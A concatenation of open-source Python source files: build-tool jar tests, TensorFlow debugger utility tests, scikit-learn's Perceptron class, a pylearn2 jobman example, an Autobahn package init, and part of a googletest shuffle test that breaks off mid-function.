self.jar_task = self.prepare_execute(self.context())
def tearDown(self):
super(BaseJarTaskTest, self).tearDown()
if self.workdir:
safe_rmtree(self.workdir)
@contextmanager
def jarfile(self):
with temporary_file() as fd:
fd.close()
yield fd.name
def prepare_jar_task(self, context):
return self.prepare_execute(context)
def assert_listing(self, jar, *expected_items):
self.assertEquals(set(['META-INF/', 'META-INF/MANIFEST.MF']) | set(expected_items),
set(jar.namelist()))
class JarTaskTest(BaseJarTaskTest):
MAX_SUBPROC_ARGS = 50
def setUp(self):
super(JarTaskTest, self).setUp()
self.set_options(max_subprocess_args=self.MAX_SUBPROC_ARGS)
self.jar_task = self.prepare_jar_task(self.context())
def test_update_write(self):
with temporary_dir() as chroot:
_path = os.path.join(chroot, 'a/b/c')
safe_mkdir(_path)
data_file = os.path.join(_path, 'd.txt')
with open(data_file, 'w') as fd:
fd.write('e')
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile) as jar:
jar.write(data_file, 'f/g/h')
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'f/', 'f/g/', 'f/g/h')
self.assertEquals('e', jar.read('f/g/h'))
def test_update_writestr(self):
def assert_writestr(path, contents, *entries):
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile) as jar:
jar.writestr(path, contents)
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, *entries)
self.assertEquals(contents, jar.read(path))
assert_writestr('a.txt', b'b', 'a.txt')
assert_writestr('a/b/c.txt', b'd', 'a/', 'a/b/', 'a/b/c.txt')
def test_overwrite_write(self):
with temporary_dir() as chroot:
_path = os.path.join(chroot, 'a/b/c')
safe_mkdir(_path)
data_file = os.path.join(_path, 'd.txt')
with open(data_file, 'w') as fd:
fd.write('e')
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile, overwrite=True) as jar:
jar.write(data_file, 'f/g/h')
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'f/', 'f/g/', 'f/g/h')
self.assertEquals('e', jar.read('f/g/h'))
def test_overwrite_writestr(self):
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile, overwrite=True) as jar:
jar.writestr('README', b'42')
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'README')
self.assertEquals('42', jar.read('README'))
def test_custom_manifest(self):
contents = b'Manifest-Version: 1.0\r\nCreated-By: test\r\n\r\n'
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile, overwrite=True) as jar:
jar.writestr('README', b'42')
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'README')
self.assertEquals('42', jar.read('README'))
self.assertNotEqual(contents, jar.read('META-INF/MANIFEST.MF'))
with self.jar_task.open_jar(existing_jarfile, overwrite=False) as jar:
jar.writestr('META-INF/MANIFEST.MF', contents)
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'README')
self.assertEquals('42', jar.read('README'))
self.assertEquals(contents, jar.read('META-INF/MANIFEST.MF'))
def test_classpath(self):
def manifest_content(classpath):
return (b'Manifest-Version: 1.0\r\n' +
b'Class-Path: {}\r\n' +
b'Created-By: org.pantsbuild.tools.jar.JarBuilder\r\n\r\n').format(
' '.join(maybe_list(classpath)))
def assert_classpath(classpath):
with self.jarfile() as existing_jarfile:
      # Note that for -classpath there is no update mode; it always overwrites.
# To verify this, first add a random classpath, and verify it's overwritten by
# the supplied classpath value.
with self.jar_task.open_jar(existing_jarfile) as jar:
jar.classpath('something_should_be_overwritten.jar')
with self.jar_task.open_jar(existing_jarfile) as jar:
jar.classpath(classpath)
with open_zip(existing_jarfile) as jar:
self.assertEqual(manifest_content(classpath), jar.read('META-INF/MANIFEST.MF'))
assert_classpath('a.jar')
assert_classpath(['a.jar', 'b.jar'])
def test_update_jars(self):
with self.jarfile() as main_jar:
with self.jarfile() as included_jar:
with self.jar_task.open_jar(main_jar) as jar:
jar.writestr('a/b', b'c')
with self.jar_task.open_jar(included_jar) as jar:
jar.writestr('e/f', b'g')
with self.jar_task.open_jar(main_jar) as jar:
jar.writejar(included_jar)
with open_zip(main_jar) as jar:
self.assert_listing(jar, 'a/', 'a/b', 'e/', 'e/f')
def test_overwrite_jars(self):
with self.jarfile() as main_jar:
with self.jarfile() as included_jar:
with self.jar_task.open_jar(main_jar) as jar:
jar.writestr('a/b', b'c')
with self.jar_task.open_jar(included_jar) as jar:
jar.writestr('e/f', b'g')
# Create lots of included jars (even though they're all the same)
# so the -jars argument to jar-tool will exceed max_args limit thus
# switch to @argfile calling style.
with self.jar_task.open_jar(main_jar, overwrite=True) as jar:
for i in range(self.MAX_SUBPROC_ARGS + 1):
jar.writejar(included_jar)
with open_zip(main_jar) as jar:
self.assert_listing(jar, 'e/', 'e/f')
class JarBuilderTest(BaseJarTaskTest):
def setUp(self):
super(JarBuilderTest, self).setUp()
self.set_options(max_subprocess_args=100)
def _add_to_classes_by_target(self, context, tgt, filename):
class_products = context.products.get_data('classes_by_target',
lambda: defaultdict(MultipleRootedProducts))
java_agent_products = MultipleRootedProducts()
java_agent_products.add_rel_paths(os.path.join(self.build_root,
os.path.dirname(filename)),
[os.path.basename(filename)])
class_products[tgt] = java_agent_products
def test_agent_manifest(self):
self.add_to_build_file('src/java/pants/agents', dedent("""
java_agent(
name='fake_agent',
premain='bob',
agent_class='fred',
can_redefine=True,
can_retransform=True,
can_set_native_method_prefix=True
)""").strip())
java_agent = self.target('src/java/pants/agents:fake_agent')
context = self.context(target_roots=[java_agent])
jar_task = self.prepare_jar_task(context)
classfile = '.pants.d/javac/classes/FakeAgent.class'
self.create_file(classfile, '0xCAFEBABE')
self._add_to_classes_by_target(context, java_agent, classfile)
context.products.safe_create_data('resources_by_target',
lambda: defaultdict(MultipleRootedProducts))
with self.jarfile() as existing_jarfile:
with jar_task.open_jar(existing_jarfile) as jar:
with jar_task.create_jar_builder(jar) as jar_builder:
jar_builder.add_target(java_agent)
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'FakeAgent.class')
self.assertEqual('0xCAFEBABE', jar.read('FakeAgent.class'))
manifest = jar.read('META-INF/MANIFEST.MF').strip()
all_entries = dict(tuple(re.split(r'\s*:\s*', line, 1)) for line in manifest.splitlines())
expected_entries = {
'Agent-Class': 'fred',
'Premain-Class': 'bob',
'Can-Redefine-Classes': 'true',
'Can-Retransform-Classes': 'true',
'Can-Set-Native-Method-Prefix': 'true',
}
self.assertEquals(set(expected_entries.items()),
set(expected_entries.items()).intersection(set(all_entries.items())))
def test_manifest_items(self):
self.add_to_build_file('src/java/hello', dedent("""
jvm_binary(
name='hello',
main='hello.Hello',
manifest_entries = {
'Foo': 'foo-value',
'Implementation-Version': '1.2.3',
},
)""").strip())
binary_target = self.target('src/java/hello:hello')
context = self.context(target_roots=[binary_target])
classfile = '.pants.d/javac/classes/hello/Hello.class'
self.create_file(classfile, '0xDEADBEEF')
self._add_to_classes_by_target(context, binary_target, classfile)
context.products.safe_create_data('resources_by_target',
lambda: defaultdict(MultipleRootedProducts))
jar_task = self.prepare_jar_task(context)
with self.jarfile() as existing_jarfile:
with jar_task.open_jar(existing_jarfile) as jar:
with jar_task.create_jar_builder(jar) as jar_builder:
jar_builder.add_target(binary_target)
with open_zip(existing_jarfile) as jar:
manifest = jar.read('META-INF/MANIFEST.MF').strip()
all_entries = dict(tuple(re.split(r'\s*:\s*', line, 1)) for line in manifest.splitlines())
expected_entries = {
'Foo': 'foo-value',
'Implementation-Version': '1.2.3',
}
self.assertEquals(set(expected_entries.items()),
set(expected_entries.items()).intersection(set(all_entries.items())))
| apache-2.0 |
Intel-tensorflow/tensorflow | tensorflow/python/debug/lib/debug_utils_test.py | 14 | 13535 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TensorFlow Debugger (tfdbg) Utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
@test_util.run_v1_only("Requires tf.Session")
class DebugUtilsTest(test_util.TensorFlowTestCase):
@classmethod
def setUpClass(cls):
cls._sess = session.Session()
with cls._sess:
cls._a_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
cls._b_init_val = np.array([[2.0], [-1.0]])
cls._c_val = np.array([[-4.0], [np.nan]])
cls._a_init = constant_op.constant(
cls._a_init_val, shape=[2, 2], name="a1_init")
cls._b_init = constant_op.constant(
cls._b_init_val, shape=[2, 1], name="b_init")
cls._a = variables.VariableV1(cls._a_init, name="a1")
cls._b = variables.VariableV1(cls._b_init, name="b")
cls._c = constant_op.constant(cls._c_val, shape=[2, 1], name="c")
# Matrix product of a and b.
cls._p = math_ops.matmul(cls._a, cls._b, name="p1")
# Sum of two vectors.
cls._s = math_ops.add(cls._p, cls._c, name="s")
cls._graph = cls._sess.graph
# These are all the expected nodes in the graph:
# - Two variables (a, b), each with four nodes (Variable, init, Assign,
# read).
# - One constant (c).
# - One add operation and one matmul operation.
# - One wildcard node name ("*") that covers nodes created internally
# by TensorFlow itself (e.g., Grappler).
cls._expected_num_nodes = 4 * 2 + 1 + 1 + 1 + 1
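    # That is, (4 * 2) variable-related nodes + c + matmul + add + "*" = 12.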
def setUp(self):
self._run_options = config_pb2.RunOptions()
def _verify_watches(self, watch_opts, expected_output_slot,
expected_debug_ops, expected_debug_urls):
"""Verify a list of debug tensor watches.
    This requires that all watches in the watch list have exactly the same
output_slot, debug_ops and debug_urls.
Args:
watch_opts: Repeated protobuf field of DebugTensorWatch.
expected_output_slot: Expected output slot index, as an integer.
expected_debug_ops: Expected debug ops, as a list of strings.
expected_debug_urls: Expected debug URLs, as a list of strings.
Returns:
List of node names from the list of debug tensor watches.
"""
node_names = []
for watch in watch_opts:
node_names.append(watch.node_name)
if watch.node_name == "*":
self.assertEqual(-1, watch.output_slot)
self.assertEqual(expected_debug_ops, watch.debug_ops)
self.assertEqual(expected_debug_urls, watch.debug_urls)
else:
self.assertEqual(expected_output_slot, watch.output_slot)
self.assertEqual(expected_debug_ops, watch.debug_ops)
self.assertEqual(expected_debug_urls, watch.debug_urls)
return node_names
def testAddDebugTensorWatches_defaultDebugOp(self):
debug_utils.add_debug_tensor_watch(
self._run_options, "foo/node_a", 1, debug_urls="file:///tmp/tfdbg_1")
debug_utils.add_debug_tensor_watch(
self._run_options, "foo/node_b", 0, debug_urls="file:///tmp/tfdbg_2")
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(2, len(debug_watch_opts))
watch_0 = debug_watch_opts[0]
watch_1 = debug_watch_opts[1]
self.assertEqual("foo/node_a", watch_0.node_name)
self.assertEqual(1, watch_0.output_slot)
self.assertEqual("foo/node_b", watch_1.node_name)
self.assertEqual(0, watch_1.output_slot)
# Verify default debug op name.
self.assertEqual(["DebugIdentity"], watch_0.debug_ops)
self.assertEqual(["DebugIdentity"], watch_1.debug_ops)
# Verify debug URLs.
self.assertEqual(["file:///tmp/tfdbg_1"], watch_0.debug_urls)
self.assertEqual(["file:///tmp/tfdbg_2"], watch_1.debug_urls)
def testAddDebugTensorWatches_explicitDebugOp(self):
debug_utils.add_debug_tensor_watch(
self._run_options,
"foo/node_a",
0,
debug_ops="DebugNanCount",
debug_urls="file:///tmp/tfdbg_1")
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(1, len(debug_watch_opts))
watch_0 = debug_watch_opts[0]
self.assertEqual("foo/node_a", watch_0.node_name)
self.assertEqual(0, watch_0.output_slot)
# Verify default debug op name.
self.assertEqual(["DebugNanCount"], watch_0.debug_ops)
# Verify debug URLs.
self.assertEqual(["file:///tmp/tfdbg_1"], watch_0.debug_urls)
def testAddDebugTensorWatches_multipleDebugOps(self):
debug_utils.add_debug_tensor_watch(
self._run_options,
"foo/node_a",
0,
debug_ops=["DebugNanCount", "DebugIdentity"],
debug_urls="file:///tmp/tfdbg_1")
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(1, len(debug_watch_opts))
watch_0 = debug_watch_opts[0]
self.assertEqual("foo/node_a", watch_0.node_name)
self.assertEqual(0, watch_0.output_slot)
# Verify default debug op name.
self.assertEqual(["DebugNanCount", "DebugIdentity"], watch_0.debug_ops)
# Verify debug URLs.
self.assertEqual(["file:///tmp/tfdbg_1"], watch_0.debug_urls)
def testAddDebugTensorWatches_multipleURLs(self):
debug_utils.add_debug_tensor_watch(
self._run_options,
"foo/node_a",
0,
debug_ops="DebugNanCount",
debug_urls=["file:///tmp/tfdbg_1", "file:///tmp/tfdbg_2"])
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(1, len(debug_watch_opts))
watch_0 = debug_watch_opts[0]
self.assertEqual("foo/node_a", watch_0.node_name)
self.assertEqual(0, watch_0.output_slot)
# Verify default debug op name.
self.assertEqual(["DebugNanCount"], watch_0.debug_ops)
# Verify debug URLs.
self.assertEqual(["file:///tmp/tfdbg_1", "file:///tmp/tfdbg_2"],
watch_0.debug_urls)
def testWatchGraph_allNodes(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_ops=["DebugIdentity", "DebugNanCount"],
debug_urls="file:///tmp/tfdbg_1")
debug_watch_opts = self._run_options.debug_options.debug_tensor_watch_opts
self.assertEqual(self._expected_num_nodes, len(debug_watch_opts))
# Verify that each of the nodes in the graph with output tensors in the
# graph have debug tensor watch.
node_names = self._verify_watches(debug_watch_opts, 0,
["DebugIdentity", "DebugNanCount"],
["file:///tmp/tfdbg_1"])
# Verify the node names.
self.assertIn("a1_init", node_names)
self.assertIn("a1", node_names)
self.assertIn("a1/Assign", node_names)
self.assertIn("a1/read", node_names)
self.assertIn("b_init", node_names)
self.assertIn("b", node_names)
self.assertIn("b/Assign", node_names)
self.assertIn("b/read", node_names)
self.assertIn("c", node_names)
self.assertIn("p1", node_names)
self.assertIn("s", node_names)
# Assert that the wildcard node name has been created.
self.assertIn("*", node_names)
def testWatchGraph_nodeNameAllowlist(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_allowlist="(a1$|a1_init$|a1/.*|p1$)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(
sorted(["a1_init", "a1", "a1/Assign", "a1/read", "p1"]),
sorted(node_names))
def testWatchGraph_opTypeAllowlist(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
op_type_regex_allowlist="(Variable|MatMul)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(sorted(["a1", "b", "p1"]), sorted(node_names))
def testWatchGraph_nodeNameAndOpTypeAllowlists(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_allowlist="([a-z]+1$)",
op_type_regex_allowlist="(MatMul)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(["p1"], node_names)
def testWatchGraph_tensorDTypeAllowlist(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
tensor_dtype_regex_allowlist=".*_ref")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertItemsEqual(["a1", "a1/Assign", "b", "b/Assign"], node_names)
def testWatchGraph_nodeNameAndTensorDTypeAllowlists(self):
debug_utils.watch_graph(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_allowlist="^a.*",
tensor_dtype_regex_allowlist=".*_ref")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertItemsEqual(["a1", "a1/Assign"], node_names)
def testWatchGraph_nodeNameDenylist(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_denylist="(a1$|a1_init$|a1/.*|p1$)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(
sorted(["b_init", "b", "b/Assign", "b/read", "c", "s"]),
sorted(node_names))
def testWatchGraph_opTypeDenylist(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
op_type_regex_denylist="(Variable|Identity|Assign|Const)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(sorted(["p1", "s"]), sorted(node_names))
def testWatchGraph_nodeNameAndOpTypeDenylists(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_denylist="p1$",
op_type_regex_denylist="(Variable|Identity|Assign|Const)")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertEqual(["s"], node_names)
def testWatchGraph_tensorDTypeDenylists(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
tensor_dtype_regex_denylist=".*_ref")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertNotIn("a1", node_names)
self.assertNotIn("a1/Assign", node_names)
self.assertNotIn("b", node_names)
self.assertNotIn("b/Assign", node_names)
self.assertIn("s", node_names)
def testWatchGraph_nodeNameAndTensorDTypeDenylists(self):
debug_utils.watch_graph_with_denylists(
self._run_options,
self._graph,
debug_urls="file:///tmp/tfdbg_1",
node_name_regex_denylist="^s$",
tensor_dtype_regex_denylist=".*_ref")
node_names = self._verify_watches(
self._run_options.debug_options.debug_tensor_watch_opts, 0,
["DebugIdentity"], ["file:///tmp/tfdbg_1"])
self.assertNotIn("a1", node_names)
self.assertNotIn("a1/Assign", node_names)
self.assertNotIn("b", node_names)
self.assertNotIn("b/Assign", node_names)
self.assertNotIn("s", node_names)
if __name__ == "__main__":
googletest.main()
| apache-2.0 |
altairpearl/scikit-learn | sklearn/linear_model/perceptron.py | 39 | 3863 | # Author: Mathieu Blondel
# License: BSD 3 clause
from .stochastic_gradient import BaseSGDClassifier
from ..feature_selection.from_model import _LearntSelectorMixin
class Perceptron(BaseSGDClassifier, _LearntSelectorMixin):
"""Perceptron
Read more in the :ref:`User Guide <perceptron>`.
Parameters
----------
penalty : None, 'l2' or 'l1' or 'elasticnet'
The penalty (aka regularization term) to be used. Defaults to None.
alpha : float
Constant that multiplies the regularization term if regularization is
used. Defaults to 0.0001
fit_intercept : bool
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered. Defaults to True.
n_iter : int, optional
The number of passes over the training data (aka epochs).
Defaults to 5.
shuffle : bool, optional, default True
Whether or not the training data should be shuffled after each epoch.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
verbose : integer, optional
The verbosity level
n_jobs : integer, optional
The number of CPUs to use to do the OVA (One Versus All, for
multi-class problems) computation. -1 means 'all CPUs'. Defaults
to 1.
eta0 : double
Constant by which the updates are multiplied. Defaults to 1.
class_weight : dict, {class_label: weight} or "balanced" or None, optional
Preset for the class_weight fit parameter.
Weights associated with classes. If not given, all classes
are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
Attributes
----------
coef_ : array, shape = [1, n_features] if n_classes == 2 else [n_classes,\
n_features]
Weights assigned to the features.
intercept_ : array, shape = [1] if n_classes == 2 else [n_classes]
Constants in decision function.
Notes
-----
`Perceptron` and `SGDClassifier` share the same underlying implementation.
In fact, `Perceptron()` is equivalent to `SGDClassifier(loss="perceptron",
eta0=1, learning_rate="constant", penalty=None)`.
See also
--------
SGDClassifier
References
----------
https://en.wikipedia.org/wiki/Perceptron and references therein.
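
    Examples
    --------
    A minimal usage sketch on toy data (illustrative only; the exact
    fitted weights depend on the SGD run)::

        from sklearn.linear_model import Perceptron

        X = [[0., 0.], [1., 1.]]
        y = [0, 1]
        clf = Perceptron(n_iter=10, random_state=0).fit(X, y)
        clf.predict([[2., 2.]])  # expected to assign class 1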
"""
def __init__(self, penalty=None, alpha=0.0001, fit_intercept=True,
n_iter=5, shuffle=True, verbose=0, eta0=1.0, n_jobs=1,
random_state=0, class_weight=None, warm_start=False):
super(Perceptron, self).__init__(loss="perceptron",
penalty=penalty,
alpha=alpha, l1_ratio=0,
fit_intercept=fit_intercept,
n_iter=n_iter,
shuffle=shuffle,
verbose=verbose,
random_state=random_state,
learning_rate="constant",
eta0=eta0,
power_t=0.5,
warm_start=warm_start,
class_weight=class_weight,
n_jobs=n_jobs)
| bsd-3-clause |
pkainz/pylearn2 | pylearn2/scripts/jobman/tester.py | 44 | 3126 | """
This is an example script that inserts pylearn2 yaml code into a jobman database.
The code below defines a yaml template string in state.yaml_template,
and the values of its hyper-parameters in state.hyper_parameters, and
runs the code located in state.extract_results on this model
using jobman.
Actually, we add the job here and it can be launched later as usual
(please check how to start jobs using jobman from the jobman tutorial
website)
"""
from nose.plugins.skip import SkipTest
try:
from jobman.tools import DD, flatten
from jobman import api0, sql
except ImportError:
raise SkipTest()
from pylearn2.scripts.jobman import experiment
def result_extractor(train_obj):
"""
    This is a user-specific function that is used by jobman to extract results.
    The returned dictionary will be saved in state.results.
"""
import numpy
channels = train_obj.model.monitor.channels
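    # The channel name below is the monitor entry produced by the SGD cost
    # configured in state.yaml_template; it is specific to that setup.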
train_cost = channels['sgd_cost(ExhaustiveSGD[X])']
best_epoch = numpy.argmin(train_cost.val_record)
best_rec_error = train_cost.val_record[best_epoch]
batch_num = train_cost.batch_record[best_epoch]
return dict(
best_epoch=best_epoch,
train_rec_error=best_rec_error,
batch_num=batch_num)
if __name__ == '__main__':
db = api0.open_db('sqlite:///test.db?table=test_jobman_pylearn2')
state = DD()
state.yaml_template = '''
!obj:pylearn2.train.Train {
"dataset": !obj:pylearn2.datasets.npy_npz.NpyDataset &dataset {
"file" : "%(file)s"
},
"model": !obj:pylearn2.autoencoder.ContractiveAutoencoder {
"nvis" : %(nvis)d,
"nhid" : %(nhid)d,
"irange" : 0.05,
"act_enc": "sigmoid", #for some reason only sigmoid function works
"act_dec": "sigmoid",
},
"algorithm": !obj:pylearn2.training_algorithms.sgd.SGD {
"learning_rate" : %(learning_rate)f,
"batch_size" : %(batch_size)d,
"monitoring_batches" : 5,
"monitoring_dataset" : *dataset,
"cost" : !obj:pylearn2.costs.cost.SumOfCosts {
"costs": [
[1.0, !obj:pylearn2.costs.autoencoder.MeanBinaryCrossEntropy {} ],
[%(coefficient)f, !obj:pylearn2.costs.cost.MethodCost { method: 'contraction_penalty' } ]
]
},
"termination_criterion" : %(term_crit)s,
}
}
'''
state.hyper_parameters = {
"file": "${PYLEARN2_DATA_PATH}/UTLC/pca/sylvester_train_x_pca32.npy",
"nvis": 32,
"nhid": 6,
"learning_rate": 0.1,
"batch_size": 10,
"coefficient": 0.5,
"term_crit": {
"__builder__": "pylearn2.training_algorithms.sgd.EpochCounter",
"max_epochs": 2
}
}
state.extract_results = "pylearn2.scripts.jobman.tester.result_extractor"
sql.insert_job(
experiment.train_experiment,
flatten(state),
db,
force_dup=True)
| bsd-3-clause |
shadda/AutobahnPython | autobahn/autobahn/__init__.py | 7 | 1043 | ###############################################################################
##
## Copyright 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from _version import __version__
version = __version__ # backward compat.
import util
import useragent
import flashpolicy
import httpstatus
import utf8validator
import xormasker
import websocket
import resource
import prefixmap
import wamp
| apache-2.0 |
julesy89/ttp-cpp | vendor/gmock-1.7.0/gtest/test/gtest_shuffle_test.py | 3023 | 12549 | #!/usr/bin/env python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that test shuffling works."""
__author__ = '[email protected] (Zhanyong Wan)'
import os
import gtest_test_utils
# Command to run the gtest_shuffle_test_ program.
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_shuffle_test_')
# The environment variables for test sharding.
TOTAL_SHARDS_ENV_VAR = 'GTEST_TOTAL_SHARDS'
SHARD_INDEX_ENV_VAR = 'GTEST_SHARD_INDEX'
TEST_FILTER = 'A*.A:A*.B:C*'
ALL_TESTS = []
ACTIVE_TESTS = []
FILTERED_TESTS = []
SHARDED_TESTS = []
SHUFFLED_ALL_TESTS = []
SHUFFLED_ACTIVE_TESTS = []
SHUFFLED_FILTERED_TESTS = []
SHUFFLED_SHARDED_TESTS = []
def AlsoRunDisabledTestsFlag():
return '--gtest_also_run_disabled_tests'
def FilterFlag(test_filter):
return '--gtest_filter=%s' % (test_filter,)
def RepeatFlag(n):
return '--gtest_repeat=%s' % (n,)
def ShuffleFlag():
return '--gtest_shuffle'
def RandomSeedFlag(n):
return '--gtest_random_seed=%s' % (n,)
def RunAndReturnOutput(extra_env, args):
"""Runs the test program and returns its output."""
environ_copy = os.environ.copy()
environ_copy.update(extra_env)
return gtest_test_utils.Subprocess([COMMAND] + args, env=environ_copy).output
def GetTestsForAllIterations(extra_env, args):
"""Runs the test program and returns a list of test lists.
Args:
extra_env: a map from environment variables to their values
args: command line flags to pass to gtest_shuffle_test_
Returns:
A list where the i-th element is the list of tests run in the i-th
test iteration.
"""
test_iterations = []
for line in RunAndReturnOutput(extra_env, args).split('\n'):
if line.startswith('----'):
tests = []
test_iterations.append(tests)
elif line.strip():
tests.append(line.strip()) # 'TestCaseName.TestName'
return test_iterations
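# Illustrative example: given program output such as
#   ----
#   TestCaseA.TestOne
#   TestCaseA.TestTwo
#   ----
#   TestCaseA.TestTwo
#   TestCaseA.TestOne
# this returns [['TestCaseA.TestOne', 'TestCaseA.TestTwo'],
#               ['TestCaseA.TestTwo', 'TestCaseA.TestOne']].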
def GetTestCases(tests):
"""Returns a list of test cases in the given full test names.
Args:
tests: a list of full test names
Returns:
A list of test cases from 'tests', in their original order.
Duplicates are removed; only the first occurrence of each test case is kept.
"""
test_cases = []
for test in tests:
test_case = test.split('.')[0]
if not test_case in test_cases:
test_cases.append(test_case)
return test_cases
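# Illustrative example (every duplicate is dropped, not only consecutive ones):
#   GetTestCases(['A.one', 'A.two', 'B.one', 'A.three'])  # -> ['A', 'B']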
def CalculateTestLists():
"""Calculates the list of tests run under different flags."""
if not ALL_TESTS:
ALL_TESTS.extend(
GetTestsForAllIterations({}, [AlsoRunDisabledTestsFlag()])[0])
if not ACTIVE_TESTS:
ACTIVE_TESTS.extend(GetTestsForAllIterations({}, [])[0])
if not FILTERED_TESTS:
FILTERED_TESTS.extend(
